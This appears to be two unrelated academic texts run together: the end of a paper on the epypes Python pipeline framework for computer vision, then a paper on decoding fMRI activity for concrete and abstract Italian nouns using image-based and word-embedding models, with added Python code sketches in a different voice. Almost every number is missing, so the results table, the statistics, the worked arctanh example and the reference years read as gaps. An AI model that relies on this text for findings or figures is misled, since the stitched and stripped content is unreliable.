graph-based. the related concept of nodelet (and component in ros ) allows to realize a processing graph structure as a part of a single operating system process. examples of this approach is often demonstrated on the applications of point cloud processing (rusu & cousins, ; munaro et al., ; carraro, munaro & menegatti, ), as to minimize latency due to inter-process or remote communication. ros-based processing graphs, especially in the single-process case, are somewhat similar to epypes pipelines. they, however, target applications with already developed algorithms, as opposed to epypes, which supports early-stage prototyping using the graph-based abstractions. other academic examples of similar robot/vision architectures include the one based on the supervisory control theory of discrete-event systems (košecka, christensen & bajcsy, ) and service-oriented dataflow-like components, auto-tuned by higher-level supervisors (crowley, hall & emonet, ). 
conclusions and further work this paper has presented epypes, an architecture and python-based software framework for building event-driven data processing pipelines. because most of vision semeniuta and falkman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithms and many data processing routines are naturally modeled as pipelines, epypes offers a capability of implementing data processing systems as dags. apart from the functional components comprising the prototype implementation of epypes, this paper has presented a system development framework that supports evolution of computational graphs from an early prototyping phase to their deployment as reactive pipelines. the principle of the epypes abstraction is demonstrated on the example of constructing a computational graph for edge detection and discussing the inner structure of the hierarchy of pipelines. further, a real scenario of deployment of an epypes pipeline for features detection and matching to a distributed system is experimentally studied. it was shown that the ability to adapt reactive behavior to various publish/subscribe middleware solutions allows to combine epypes pipelines with already available systems. the measured timing properties of the image processing component based on epypes show that the latter introduces negligible overhead comparing to the application-inherent processing time. an important part of further work should be connected with development of software abstractions on the highest level of the system development continuum shown in fig. . this will enable fine-tuning and enhancing of reactive pipelines, for example, with adapters to different messaging systems (e.g., mqtt, rabbitmq, dds), parallelizable nodes, and specialized pipeline management logic. an important task in this case is implementation of systematic error handling. a failure inside the pipeline (e.g., in the case of a vision system, due to changed lighting conditions) can be handled by issuing the corresponding event that will be processed by a remote component. in addition to queues providing asynchronous messaging, other communication modalities can be used. an rpc api (such as rest or grpc) can be established to allow external systems getting meta-information about the running pipeline and changing values of hyperparameters. last, but not least, functionality for interaction with databases should be integrated. as the presented software framework is implemented in python, it naturally gears toward system prototyping use cases. the static abstractions are useful for algorithm prototyping, while the transition to the reactive components allow for rapid deployment of the computational graphs to distributed environments. this allows for harnessing the available python data science tools and integrating them into industrial automation workflow. the limitation of the proposed implementation lies in its non-deterministic overhead due to the use of the interpreted garbage-collected programming language. hence, applications requiring high rate of operation and more deterministic running time are more likely to be developed in c++ with custom udp-based communication protocols or real-time middleware such as dds. it is of interest therefore to validate the principles of epypes using c++ codebase, as well as to devise a strategy of transforming epypes-based computational graphs to high-performance computing components, for example, via code generation. 
additional information and declarations funding this paper was written in association with the multimat project and sfi manufacturing, funded by the norwegian research council. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosure the following grant information was disclosed by the authors: multimat project and sfi manufacturing, funded by the norwegian research council. competing interests the authors declare that they have no competing interests. author contributions • oleksandr semeniuta conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • petter falkman authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the source code of the epypes library is available at github: https://github.com/semeniuta/epypes. references carraro m, munaro m, menegatti e. . a powerful and cost-efficient human perception system for camera networks and mobile robotics. in: chen w, hosoda k, menegatti e, shimizu m, wang h, eds. intelligent autonomous systems . ias . advances in intelligent systems and computing. vol. . cham: springer, – . cassandras c, lafortune s. . introduction to discrete event systems. new york: springer. crowley jl, hall d, emonet r. . autonomic computer vision systems. in: international conference on computer vision systems, icvs. vol. . bielefeld: applied computer science group. dworak a, ehm f, charrue p, sliwinski w. . the new cern controls middleware. journal of physics: conference series ( ): doi . / - / / / . helala ma, pu kq, qureshi fz. . a stream algebra for computer vision pipelines. in: ieee conference on computer vision and pattern recognition workshops, columbus, oh. piscataway: ieee, – doi . /cvprw. . . helala m, pu kq, qureshi f. . a formal algebra implementation for distributed image and video stream processing. in: proceedings th international conference on distributed smart cameras (icdsc ). new york: acm. hinze a, sachs k, buchmann a. . event-based applications and enabling technologies. in: proceedings of the third acm international conference on distributed event-based systems—debs ' . new york: acm press. košecka j, christensen hi, bajcsy r. . discrete event modeling of visually guided behaviors. international journal of computer vision ( ): – doi . /bf . lee ea, seshia sa. . introduction to embedded systems, a cyber-physical systems approach. second edition. cambridge: mit press. magnoni l. . modern messaging for distributed systems. journal of physics: conference series ( ): – . munaro m, basso f, michieletto s, pagello e, menegatti e. . a software architecture for rgb-d people tracking based on ros framework for a mobile robot. in: frontiers of intelligent autonomous systems. vol. . berlin, heidelberg: springer, – . rublee e, bradski g. . orb—an efficient alternative to sift or surf. piscataway: ieee, – .
rusu rb, cousins s. . d is here: point cloud library (pcl). in: proceedings—ieee international conference on robotics and automation. piscataway: ieee, – . semeniuta o, falkman p. . discrete event dataflow as a formal approach to specification of industrial vision systems. in: ieee international conference on automation science and engineering (case), vol. -october. piscataway: ieee, – . semeniuta o, falkman p. . flexible image acquisition service for distributed robotic systems. in: second ieee international conference on robotic computing (irc). piscataway: ieee, – . zeromq. . broker vs. brokerless. available at http://zeromq.org/whitepapers:brokerless (accessed february ).
visually grounded and textual semantic models differentially decode brain activity associated with concrete and abstract nouns andrew j. anderson brain & cognitive sciences university of rochester aander @ur.rochester.edu douwe kiela computer laboratory university of cambridge dk @cam.ac.uk stephen clark computer laboratory university of cambridge sc @cam.ac.uk massimo poesio school of computer science and electronic engineering university of essex poesio@essex.ac.uk abstract important advances have recently been made using computational semantic models to decode brain activity patterns associated with concepts; however, this work has almost exclusively focused on concrete nouns. how well these models extend to decoding abstract nouns is largely unknown. we address this question by applying state-of-the-art computational models to decode functional magnetic resonance imaging (fmri) activity patterns, elicited by participants reading and imagining a diverse set of both concrete and abstract nouns. one of the models we use is linguistic, exploiting the recent word vec skipgram approach trained on wikipedia. the second is visually grounded, using deep convolutional neural networks trained on google images. dual coding theory considers concrete concepts to be encoded in the brain both linguistically and visually, and abstract concepts only linguistically. splitting the fmri data according to human concreteness ratings, we indeed observe that both models significantly decode the most concrete nouns; however, accuracy is significantly greater using the text-based models for the most abstract nouns. more generally this confirms that current computational models are sufficiently advanced to assist in investigating the representational structure of abstract concepts in the brain. introduction since the work of mitchell et al. ( ), there has been increasing interest in using computational semantic models to interpret neural activity patterns scanned as participants engage in conceptual tasks. this research has almost exclusively focused on brain activity elicited as participants comprehend concrete nouns as experimental stimuli.
different modelling approaches — predominantly distributional semantic models (mitchell et al., ; devereux et al., ; murphy et al., ; pereira et al., ; carlson et al., ) and semantic models based on human behavioural estimation of conceptual features (palatucci et al., ; sudre et al., ; chang et al., ; bruffaerts et al., ; fernandino et al., ) — have elucidated how different brain regions contribute to semantic representation of concrete nouns; however, how these results extend to non-concrete nouns is unknown. in computational modelling there has been increasing importance attributed to grounding semantic models in sensory modalities, e.g., bruni et al. ( ), kiela and bottou ( ). andrews et al. ( ) demonstrated that multi-modal models formed by combining text-based distributional information with behaviourally generated conceptual properties (as a surrogate for perceptual experience) provide a better proxy for human-like intelligence. however, both the text-based and behaviourally-based components of their model were ultimately derived from linguistic information. since then, in analyses of brain data, anderson et al. ( ) have applied multi-modal models incorporating features that are truly grounded in natural image statistics to further support this claim. in addition, anderson et al. ( ) have demonstrated that visually grounded models describe brain activity associated with internally induced visual features of objects as the objects' names are read and comprehended. having both image- and text-based models of semantic representation, and neural activity patterns associated with concrete and abstract nouns, enables a natural test of dual coding theory (paivio, ). dual coding posits that concrete concepts are represented in the brain in terms of a visual and linguistic code, whereas abstract concepts are only represented by a linguistic code. whereas previous work has demonstrated that image- and text-based semantic models contribute to explaining neural activity patterns associated with concrete nouns, it remains unclear whether either text- or image-based semantic models can decode neural activity patterns associated with abstract words. we extend previous work by applying image- and text-based computational semantic models to decode an fmri data set spanning a diverse set of nouns of varying concreteness. the -word stimuli for the fmri experiment (listed in table ) are semantically structured according to taxonomic categories and domains embedded in wordnet (fellbaum, ) and its extensions. participants read the noun and were instructed to imagine a situation that they personally associate with the noun. in this sense, the data solicited was targeting deep thought patterns (deeper than might be anticipated for rapid semantic processing required in conversations and many real-time interactions with the world). in the analysis we split the fmri data set into the most concrete and most abstract words based on behavioural concreteness ratings. our key contribution is in demonstrating a decoding advantage for text-based semantic models over the image-based models when decoding the more abstract nouns. in line with the previous results of anderson et al. ( ) and anderson et al.
( ), both visual and textual models decode the more concrete nouns. the image- and text-based computational models we use have recently been developed using neural networks (mikolov et al., ; jia et al., ). the image-based model is built using a deep con- volutional neural network approach, similar in na- ture to those recently used to study neural represen- tations of visual stimuli (see kriegeskorte ( ), al- though note this is the first application to study word elicited neural activation known to the authors). for decoding we use a recently introduced algorithm (anderson et al., ) that abstracts the decoding task to representational similarity space, and achieve decoding accuracies on par with those convention- ally achieved through discriminating concrete nouns (and higher if we combine data to exploit group- level regularities). because the fmri experiments were performed in italian on native italians, and because approximately comparable text corpora in content were available in english and italian (english and italian wikipedia), we were able to compare how well english and ital- ian text-based semantic models can decode neural activity patterns. whilst italian wikipedia could reasonably be expected to be advantaged by sup- porting culturally appropriate nuances of seman- tic structure, it is disadvantaged by being consider- ably smaller than english wikipedia. taking inspi- ration from previous work exploiting cross-lingual resources (richman and schone, ; shi et al., ; darwish, ) we combined italian and en- glish text-based models in our decoding analyses in an attempt to leverage the benefits of both. although combined language and english models tended to yield marginally better decoding accura- cies, there were no significant differences between the different language models. whilst we expect se- mantic structure on a grand scale to broadly straddle language boundaries for most concrete and abstract concepts (albeit with cultural specificities), this is proof of principle that cross linguistic commonali- ties are reflected in neural activity patterns measur- able with current technology. brain data we reanalyze the fmri data originally collected by anderson et al. ( ), who investigated the rel- evance of different taxonomic categories and do- mains embedded in wordnet to the organization of conceptual knowledge in the brain. . word stimuli anderson et al. ( ) systematically selected a list of words intended to be representative of a broad range of abstract and concrete nouns. these were organised according to the domains of law and music, cross-classified with seven taxonomic cate- gories. 
they began by identifying low-concreteness words in the norms of barca et al. ( ). they then linked these to wordnet to identify the taxonomic category of the dominant sense of each word. six taxonomic categories that were heavily populated with abstract words, as well as one unambiguously concrete category, were chosen. all categories supported ample coverage of the law and music domains (determined according to wordnet domains (bentivogli et al., )). five law words and five music words were selected from each taxonomic category. taxonomic categories and example stimulus words (translated into english) are as below: ur-abstract: anderson et al.'s term for concepts that are classified as abstract in wordnet but do not belong to a clear subcategory, e.g., law or music. attribute: a construct whereby objects or individuals can be distinguished, e.g., legality, tonality. communication: something that is communicated by, to or between groups, e.g., accusation, symphony. event/action: something that happens at a given place and time, e.g., crime, festival. person/social-role: individual, someone, somebody, mortal, e.g., judge, musician. location: points or extents in space, e.g., court, theatre. object/tool: a class of unambiguously concrete nouns, e.g., handcuffs, violin. the full list of stimuli is in table .

table : italian stimulus words and english translations, divided into law and music domains (columns), and taxonomic categories (groups of rows). the most concrete half of the words are indicated in bold font. strike-throughs indicate words for which we did not have semantic model coverage.
ur-abstracts. law: giustizia (justice), liberta' (liberty), legge (law), corruzione (corruption), refurtiva (loot). music: musica (music), blues (blues), jazz (jazz), canto (singing), punk (punk).
attribute. law: giurisdizione (jurisdiction), cittadinanza (citizenship), impunita' (impunity), legalita' (legality), illegalita' (illegality). music: sonorita' (sonority), ritmo (rhythm), melodia (melody), tonalita' (tonality), intonazione (pitch).
communication. law: divieto (prohibition), verdetto (verdict), ordinanza (decree), addebito (accusation), ingiunzione (injunction). music: canzone (song), pentagramma (stave), ballata (ballad), ritornello (refrain), sinfonia (symphony).
event/action. law: arresto (arrest), processo (trial), reato (crime), furto (theft), assoluzione (acquittal). music: concerto (concert), recital (recital), assolo (solo), festival (festival), spettacolo (show).
person/social-role. law: giudice (judge), ladro (thief), imputato (defendant), testimone (witness), avvocato (lawyer). music: musicista (musician), cantante (singer), compositore (composer), chitarrista (guitarist), tenore (tenor).
location. law: tribunale (court/tribunal), carcere (prison), questura (police-station), penitenziario (penitentiary), patibolo (gallows). music: palco (stage), auditorium (auditorium), discoteca (disco), conservatorio (conservatory), teatro (theatre).
object/tool. law: manette (handcuffs), toga (robe), manganello (truncheon), cappio (noose), grimaldello (skeleton-key). music: violino (violin), tamburo (drum), tromba (trumpet), metronomo (metronome), radio (radio).

we split the stimulus nouns into the most concrete and most abstract words according to the behavioural concreteness ratings from anderson et al. ( ). . fmri experiment participants nine right-handed native italian speakers aged between and years ( women) were recruited to take part in the study. two were scanned after anderson et al. ( ) to match the number of participants analysed by mitchell et al. ( ). scanning had previously been halted at instead of the planned participants for a period due to equipment failure. all had normal or corrected-to-normal vision.
the stimulus words were presented as written words, in runs (all runs were collected in one par- ticipant visit), with the order of presentations ran- domised across runs. in each run, a randomly se- lected word was presented every seconds, and re- mained on screen for seconds. on reading a stim- ulus word, participants thought of a situation that they individually associated with the noun. this pro- cess is similar to previous concrete noun tasks, e.g., mitchell et al. ( ), where participants were in- structed to think of the properties of the noun. how- ever, as people encounter difficulties eliciting prop- erties of non-concrete concepts, compared to think- ing of situations in which concepts played a role (wiemer-hastings and xu, ), the experimental paradigm was adapted to imagining situations. fmri acquisition and preprocessing anderson et al. ( ) recorded fmri images on a t bruker medspec mri scanner. they used an echo planar imaging (epi) pulse sequence with a msec rep- etition time, an echo time of msec, and a ◦ flip angle. a × acquisition matrix was used, and slices were imaged with a between-slice gap of mm. voxels had dimensions of mm× mm× mm. fmri data were corrected for head motion, un- warped, and spatially normalized to the montreal neurological institute and hospital (mni) template. only voxels estimated to be grey matter were in- cluded in the subsequent analysis. for each partic- ipant, for each scanning run (where a run is a com- plete presentation of words), voxel activity was corrected by removing linear trend and transformed to z scores (within each run). each stimulus word was represented as a single volume by taking the voxel-wise mean of the sec of data offset by sec from the stimulus onset (to account for hemo- dynamic response). voxel selection the most stable grey mat- ter voxels per participant were selected for analy- sis. this was undertaken within the leave- -word- out decoding procedure detailed later in section using the same method as mitchell et al. ( ): pearson’s correlation of each voxel’s activity be- tween matched word lists in all scanning run pairs ( unique run pairs giving correlation coeffi- cients of / words, where the other words were test words to be decoded) was computed. the mean coefficient was used as stability measure. voxels as- sociated with the largest stability measures were selected. semantic models . image-based semantic models following previous work in multi-modal semantics (bergsma and van durme, ; kiela et al., ), we obtain a total of images for each of the stim- ulus words from google images . images from google have been shown to yield representations that are competitive in quality compared to alterna- tive resources (bergsma and van durme, ; fer- gus et al., ). image representations are obtained by extracting the pre-softmax layer from a forward pass in a convolutional neural network (cnn) that has been trained on the imagenet classification task using caffe (jia et al., ). this approach is simi- lar to e.g., kriegeskorte ( ), except that we only use the pre-softmax layer, which has been found to work particularly well in semantic tasks (razavian et al., ; kiela and bottou, ). such cnn- derived image representations have been found to be of higher quality than traditional bag of visual words models (sivic and zisserman, ) that were pre- viously used in multi-modal semantics (bruni et al., ; kiela and bottou, ). 
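the feature-extraction step just described (a forward pass through an imagenet-trained cnn, keeping the representation that feeds the classifier, then averaging over a word's images as described in the next paragraph) can be sketched as follows. the original work used caffe; the use of torchvision, the choice of resnet18, and the helper name visual_word_vector are assumptions of this illustration rather than the authors' exact setup.

# sketch of cnn-based visual word vectors: extract a feature vector per image
# with an imagenet-trained network and average over the images for one word.
# torchvision/resnet18 are illustrative stand-ins for the caffe model used in the paper.
import torch
from PIL import Image
from torchvision import models, transforms

net = models.resnet18(weights=models.ResNet18_Weights.IMAGENET1K_V1)
net.fc = torch.nn.Identity()   # keep the representation feeding the classifier
net.eval()

preprocess = transforms.Compose([
    transforms.Resize(256),
    transforms.CenterCrop(224),
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])

def visual_word_vector(image_paths):
    """mean feature vector over the images retrieved for one stimulus word."""
    feats = []
    with torch.no_grad():
        for path in image_paths:
            img = preprocess(Image.open(path).convert("RGB")).unsqueeze(0)
            feats.append(net(img).squeeze(0))
    return torch.stack(feats).mean(dim=0)

# usage: vec = visual_word_vector(["justice_01.jpg", "justice_02.jpg"])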
we aggregate images associated with a stimulus word into an overall visually grounded representation by taking the mean of the individual image representations. image search for abstract nouns the validity and success of the following analyses are dependent on having built the image-based models from a set of images that are indeed relevant to the abstract words. the google image searches we used (www.google.com/imghp) to build the image-based models largely returned a selection of images systematically associated with our most abstract nouns. for instance, 'corruption' returns suited figures covertly exchanging money; 'law', 'justice', 'music', 'tonality' return pictures of gavels, weighing scales, musical notes and circles of fifths, respectively. for 'jurisdiction', the image search returns maps and law-related objects. however, there were also misleading cases such as 'pitch' where the image search, whilst returning potentially useful pictures of sinusoidal graphs, was heavily contaminated by images of football pitches. this problem is not exclusive to images, and the current text-based models are also not immune to the multiple senses of polysemous words. . text-based semantic models for linguistic input, we use the continuous vector representations from the skip-gram model of mikolov et al. ( ). specifically, we obtained -dimensional word embeddings by training a skip-gram model using negative sampling on recent italian and english wikipedia dumps (using gensim with preprocessing from word vec's demo script). for english, representations were built for the english translations of the stimuli provided by anderson et al. ( ). the english model was trained for iteration, whereas the italian was trained for , since the italian wikipedia dump was smaller ( . vs . billion words respectively). following previous work exploiting cross-lingual textual resources (richman and schone, ; shi et al., ; darwish, ), we also applied italian and english text-based models in combination. model combination was achieved at the analysis stage, by fusing decoding outputs of italian and english models as described in section . . representational similarity-based decoding of brain activity we decoded word-level fmri representations using the semantic models following the procedure introduced by anderson et al. ( ). the process of matching models to words is abstracted to representational similarity space: for both models and brain data, words are semantically re-represented by their similarities to other words by correlating all word pairs within the native model or brain space, using pearson's correlation (see figure ). the result is two square matrices of word pair correlations: one for the fmri data, another for the model. in the similarity space, each word is a vector of correlations with all other words, thereby allowing model and brain words (similarity vectors) to be directly matched to each other.

figure : representing brain and semantic model vectors in similarity space.

in decoding, models were matched to fmri data as follows (see figure ). two test words were chosen. the voxels estimated to have the most stable signal were selected using the strategy described in section . . voxel selection was based on the fmri data of the other / words.
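the skip-gram training described earlier in this section (negative sampling over a wikipedia dump, via gensim) might be set up as in the following sketch; the corpus file name, vector dimensionality and other hyperparameters are illustrative assumptions rather than the paper's settings.

# minimal sketch of training skip-gram embeddings with gensim; the corpus file,
# vector size and other hyperparameters are assumptions for illustration.
from gensim.models import Word2Vec
from gensim.models.word2vec import LineSentence

# one pre-tokenised sentence per line, e.g. extracted from a wikipedia dump
sentences = LineSentence("wikipedia_tokenised.txt")

model = Word2Vec(
    sentences,
    vector_size=300,   # dimensionality of the word vectors (assumed here)
    sg=1,              # skip-gram (rather than cbow)
    negative=5,        # negative sampling
    window=5,
    min_count=5,
    epochs=1,
    workers=4,
)

vec = model.wv["justice"]                 # embedding for one stimulus word
print(model.wv.most_similar("justice"))   # nearest neighbours in the text space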
voxel selection was performed on / rather than all words to allay any concern that it could have systematically biased the fmri correlation structure (calculated next) to look like that of the semantic model, and consequently biased decoding performance. however, as similarity-based decoding does not optimise a mapping between fmri data and semantic model, it is not prone to modelling and decoding fmri noise as in classic cases of double dipping (kriegeskorte et al., ). indeed, as we report later in this section, there were no significant differences in decoding accuracy arising from tests using voxel selection on / versus words. a single representation of each word was built by taking the voxel-wise mean of all five presentations of the word for the selected voxels. an fmri similarity matrix for all words was then calculated. similarity vectors for the two test words were drawn from both the model and fmri similarity matrices. entries corresponding to the two test words in both model and fmri similarity vectors were removed because these values could reveal the correct answer to decoding. the two model similarity vectors were then compared to the two fmri similarity vectors by correlation, resulting in four correlation values. these correlation values were transformed using fisher's r to z (arctanh). if the sum of z-transformed correlations between the correctly matched pair exceeded the sum of correlations for the incongruent pair, decoding was scored a success, otherwise a failure. this process was then repeated for all word pairs, with the mean accuracy of all test iterations giving a final measure of success.

figure : similarity-decoding algorithm (adapted from anderson et al. ).

fisher's r to z transform (arctanh) is typically used to test for differences between correlation coefficients. it transforms the correlation coefficient r to a value z, where z has amplified values at the tails of the correlation coefficient (r otherwise ranges between - and ). this is to make the sampling distribution of z normally distributed, with approximately constant variance across values of the population correlation coefficient. in the similarity-decoding method used here, z is evaluated in decoding because it is a more principled metric to compare and combine (as later undertaken in section . ). however, under most circumstances r to z is not critical to the procedure. z noticeably differs from r only when correlations exceed . , and r to z changes decoding behaviour in select circumstances. specifically, r to z can influence how word labels are assigned to similarity vectors by upweighting high-value correlation coefficients at the final stage of decoding. a hypothetical scenario to illustrate the above point is as follows. let pearson(x,y) denote pearson's correlation of vectors x and y, let braina correspond to a brain similarity vector "a" for an unknown word label, and let model denote a semantic model similarity vector for a known word label " ". in the final stage of analysis, there are two decoding alternatives given by (i) pearson(braina,model )=. and pearson(brainb,model )=. , which when summed gives . ; (ii) pearson(braina,model )=. , pearson(brainb,model )=. . here the sum is also . and therefore (i) and (ii) are identical. applying the r to z transform would result in selection of (ii) because arctanh(. )+arctanh(. )= . , whereas arctanh(. )+arctanh(. )= . . statistical significance of decoding accuracy was determined by permutation testing.
decoding was repeated multiple times using the following proce- dure: creating a vector of word-label indices and randomly shuffling these indices; applying the vec- tor of shuffled indices to reorder both rows and columns of only one of the similarity matrices (whilst keeping the original correct row/column la- bels so that word-labels now mismatch matrix con- tents); and repeating the entire pair-matching decod- ing procedure described above. if word labels are randomly assigned to similarity vectors, we expect a chance-level decoding accuracy of %. repeti- tion of this process (here , repeats) supplies a null distribution of decoding accuracies achieved by chance. the p-value of decoding accuracy is calcu- lated as the proportion of chance accuracies that are greater than or equal to the observed decoding accu- racy. for permutation testing only, voxel selection was undertaken a single time, per participant, on all words (rather than on / words in each leave- - out decoding iteration). this was to reduce com- putation time that would otherwise have been pro- hibitive. this is very unlikely to have yielded any discernible difference in outcome. unlike de- coding strategies, that involve fitting a classifica- tion/encoding model to fmri data (and are prone to fitting and subsequently decoding fmri noise), similarity-based decoding does not learn a mapping between semantic-model and fmri data and is ro- bust to “double dipping” giving spurious decoding accuracies (see kriegeskorte et al. ( ) for prob- lems associated with double dipping). as an empirical demonstration, we reran all of our actual (non-permuted) model-based de- coding analyses, that are reported later in sec- tion . , whilst selecting voxels from all words (as opposed to leave- -out voxel-selection on / words). specifically, decoding analyses were re- peated for all model combinations, and tested first on all words, then for the most concrete words only, and finally the most abstract words only. mean de- coding accuracies for the participants yielded with and without leave- -out voxel selection were com- pared using paired t-tests. there were no significant differences across all tests. the most different (non-significant) individual result was t= . , p=. ( -tailed), and in this case leave- -out voxel selec- tion gave the higher accuracy. . model combination by ensemble averaging to test whether the three different semantic mod- els (image-based, italian/english text-based) carried complementary information, we combined the mod- els in evaluation, thus allowing us to test whether accuracies achieved using model combinations were higher than those achieved with isolated models. to combine the different models, we used an en- semble averaging strategy and ran the similarity- based decoding analyses as described above in par- allel with each of the three semantic models. at each leave- -out test iteration, this gave three arc- tanh transformed * correlation matrices (one for each semantic model) that were used to evaluate de- coding. model combination was achieved by fusing the respective arctanh transformed correlation ma- trices by summing them together. evaluation of the resulting × summation matrix proceeded as previ- ously by first summing the two congruent values on the main-diagonal of the matrix, then summing the two incongruent scores on the counter-diagonal. if the congruent sum was greater than the incongruent sum, decoding was a success, otherwise a failure. 
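the pair-matching decoding, its leave-two-out evaluation, and the permutation test described above can be sketched as follows. this is a reimplementation from the textual description, with invented variable names and toy data, not the authors' code.

# sketch of similarity-based leave-two-out decoding and its permutation test.
# `brain` and `model` below are word-by-feature matrices with one row per stimulus
# word, e.g. selected-voxel activity and semantic model vectors.
import numpy as np

def similarity_matrix(x):
    """word-by-word pearson correlation matrix."""
    return np.corrcoef(x)

def pair_decode(sim_brain, sim_model, i, j):
    """return True if the congruent assignment of test words i, j wins."""
    keep = [k for k in range(sim_brain.shape[0]) if k not in (i, j)]
    b_i, b_j = sim_brain[i, keep], sim_brain[j, keep]     # brain similarity vectors
    m_i, m_j = sim_model[i, keep], sim_model[j, keep]     # model similarity vectors
    z = lambda a, b: np.arctanh(np.corrcoef(a, b)[0, 1])  # fisher r-to-z of the match
    congruent = z(b_i, m_i) + z(b_j, m_j)
    incongruent = z(b_i, m_j) + z(b_j, m_i)
    return congruent > incongruent

def decode_accuracy(sim_brain, sim_model):
    n = sim_brain.shape[0]
    wins = [pair_decode(sim_brain, sim_model, i, j)
            for i in range(n) for j in range(i + 1, n)]
    return np.mean(wins)

def permutation_p_value(sim_brain, sim_model, n_perm=1000, seed=0):
    """shuffle word labels of one similarity matrix (rows and columns) to build a null."""
    rng = np.random.default_rng(seed)
    observed = decode_accuracy(sim_brain, sim_model)
    null = []
    for _ in range(n_perm):
        p = rng.permutation(sim_brain.shape[0])
        null.append(decode_accuracy(sim_brain[np.ix_(p, p)], sim_model))
    return observed, np.mean(np.array(null) >= observed)

# toy usage with random data (chance accuracy is about 0.5)
rng = np.random.default_rng(1)
brain, model = rng.normal(size=(67, 500)), rng.normal(size=(67, 300))
sb, sm = similarity_matrix(brain), similarity_matrix(model)
print(decode_accuracy(sb, sm))
# model combination: run pair_decode per model and sum the z-transformed match
# scores across models before the congruent/incongruent comparison, as in the
# ensemble averaging described above.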
results we split the stimulus nouns into the most con- crete and most abstract words according to the behavioural concreteness ratings from anderson et al. ( ), and ran analyses on all words combined and these two subsets. due to limitations in word coverage of the semantic models, ‘melody’ was missing from the abstract words, and ‘skeleton-key’ and ‘police-station’ were missing from the most concrete words (hence / words were analysed). . hypotheses dual coding theory (paivio, ) leads to the fol- lowing hypotheses: ( ) the text-based models will decode the more abstract nouns’ neural activity pat- terns with higher accuracy than the image-based model; ( ) both image and text-based models will decode the more concrete nouns’ neural activity. we also compared the decoding accuracy for the most concrete nouns achieved using the combined image- and text-based models to the unimodal mod- els in isolation. whilst previous analyses have ob- served advantages of multimodal models in describ- ing concrete noun fmri, it is not clear whether this effect will carry over to our noun data set. one reason is because many of the most concrete half are “less concrete” than those of previous studies: according to brysbaert et al. ( )’s concreteness norms (where words were rated on a scale from to ), the mean ± sd rating of the concrete nouns analysed by mitchell et al. ( ) (and subsequently by anderson et al. ( )) is . ±. , whereas the mean ± sd of the “most concrete” nouns anal- ysed in the current article, when tested with an inde- pendent samples t-test, was significantly smaller at . ±. (t = . , p < . , -tail). a second reason is that the experimental task required par- ticipants to imagine a situation associated with the noun, rather than think of object properties. there- fore this analysis was of a more exploratory nature. . decoding analysis decoding analyses were run using the image-based model and italian and english text-based models in isolation, and also all combinations of these models as described in section . results are in figure . in this section we use the abbreviations img for the image-based model and txit and txen, for the ital- ian and english text-based models, respectively. in all tests, chance-level decoding accuracy (the expected accuracy if word labelling is random) is %. mean±se accuracies across all participants are displayed in the leftmost column of plots for all model combinations. individual-level results are displayed for only three model combinations to avoid cluttering the graphs (img only, the combined txit&txen, and the combined img&txit&txen). to simplify the following discussion of results, we mainly focus on these three models. the choice to focus on txit&txen, rather than the italian model, was made following the rationale that the language combination would leverage cultural nu- ances of semantic structure found in the italian text- corpora jointly with the more extensive coverage of the larger english wikipedia. although txit&txen and txen tended to produce higher decoding accu- racies, there were no significant differences between either txit or txen tested in isolation, or any model combination incorporating them. mean results are displayed for all model combinations in figure and key results are tabulated in table . . 
an advantage for the textual model on abstract nouns with respect to hypothesis (an advantage for the text-based models decoding abstract neural activity patterns), the key difference to observe in figure is the drop in relative decoding accuracy between the image-based model and text-based models when decoding the most abstract nouns.

figure : results of the decoding analysis from section . . see also table . p=. lines were empirically estimated as described in section and apply to decoding an individual's fmri data (not multiple individuals).

table : key decoding accuracies from section . (see also figure ). each cell shows mean±se decoding accuracy, the number (n) of participants decoded at a level significantly above chance (p<. ), and in round brackets, the cumulative binomial probability of achieving ≥ n significant results at p=. .
                 all words combined    most concrete     most abstract
img              ± %, / (<. )          ± %, / (<. )      ± %, / (. )
txit&txen        ± %, / (<. )          ± %, / (<. )      ± %, / (<. )
img&txit&txen    ± %, / (<. )          ± %, / (<. )      ± %, / (<. )

the nine participants' mean decoding accuracies for the most abstract nouns were compared between the img, txit, txen and txit&txen models using a repeated measures anova. combinations of image- and text-based models (e.g. img&txen) were not directly relevant to this analysis (because they integrate visual and textual data) and consequently these models were excluded. bartlett's test was used to verify that there was no evidence against homogeneity of variances prior to analysis (χ² = . , p = . ). the anova indicated a statistically significant difference between models: f( , ) = . , p < . . post hoc comparisons conducted using the tukey honest significant difference (hsd) test revealed that decoding accuracies achieved using txen and the txit&txen model were significantly different from (and larger than) img (both p < . ). there were no other significant differences (including between img and txit). one possible reason for the weaker performance of txit than txen is that italian wikipedia is a less rich source of information due to being smaller in size than english wikipedia (despite it presumably containing semantic information that is more relevant to italian culture).
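a sketch of how the repeated-measures anova and tukey hsd comparison above might be run follows; the use of statsmodels, the data layout, and the toy accuracy values are assumptions for illustration, not the authors' analysis code.

# sketch of a repeated-measures anova over models followed by tukey hsd,
# using statsmodels as an assumed toolchain; accuracies here are invented toy values.
import numpy as np
import pandas as pd
from statsmodels.stats.anova import AnovaRM
from statsmodels.stats.multicomp import pairwise_tukeyhsd

rng = np.random.default_rng(0)
participants = [f"p{i}" for i in range(1, 10)]           # nine participants
semantic_models = ["img", "txit", "txen", "txit_txen"]

rows = [{"participant": p, "model": m,
         "accuracy": rng.normal(loc=0.65, scale=0.05)}    # toy decoding accuracies
        for p in participants for m in semantic_models]
df = pd.DataFrame(rows)

# repeated-measures anova: model is the within-subject factor
anova = AnovaRM(df, depvar="accuracy", subject="participant", within=["model"]).fit()
print(anova)

# post hoc pairwise comparisons with tukey's hsd
tukey = pairwise_tukeyhsd(endog=df["accuracy"], groups=df["model"], alpha=0.05)
print(tukey.summary())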
